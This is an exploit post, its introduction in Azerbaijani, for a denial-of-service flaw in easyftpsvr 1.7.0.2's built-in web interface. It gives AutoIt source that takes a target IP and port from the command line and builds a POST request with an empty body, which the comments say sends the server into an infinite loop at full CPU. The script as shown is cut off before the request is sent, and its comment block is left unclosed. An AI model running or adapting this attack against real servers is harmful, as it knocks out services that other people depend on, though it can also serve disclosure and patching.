easyftpsvr-1.7.0.2 FTP serverin web interface-sindəki vuln + exploit + demo video.
Bu vulnun nəticəsi FTP serverin işlədiyi serverdə CPU usage-ın 100% qalxmasıdır.
Nəticədə hədəf server tam anormal vəziyyətə düşür.
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=smdcpu.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include "WinHttp.au3"
#include <String.au3>
#cs
easyftpsvr-1.7.0.2 CPU consumption exploit.
The vulnerability is due easyftpsvr-1.7.0.2 's web interface (Easy-Web Server/1.0) contains flaw when accepting $_POST requests with EMPTY body.
In this case application runs into infinitve loop and consumes very high CPU usage.
Running following exploit 2-3 times against target machine that runs easyftpsvr-1.7.0.2 (against it native web interface called Easy-Web Server/1.0)
consumes high CPU usage.
---------------- Be Carefull! -----------------
*DO not run it against your real machine.(Instead of use Virtualbox)*
Otherwise hard reboot is your best friend.
Global $ipaddr=StringMid($CmdLine[1],1,15);//255.255.255.255
Global $port=StringMid($CmdLine[2],1,5);//65535
Global $useragent='Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0';
Global $reqmethod='POST';
global $root_dir='/';
Global $thisconsumes='';//<=This is a reason of High CPU consumption. Empty $_POST body causes application to run into infinitve loop//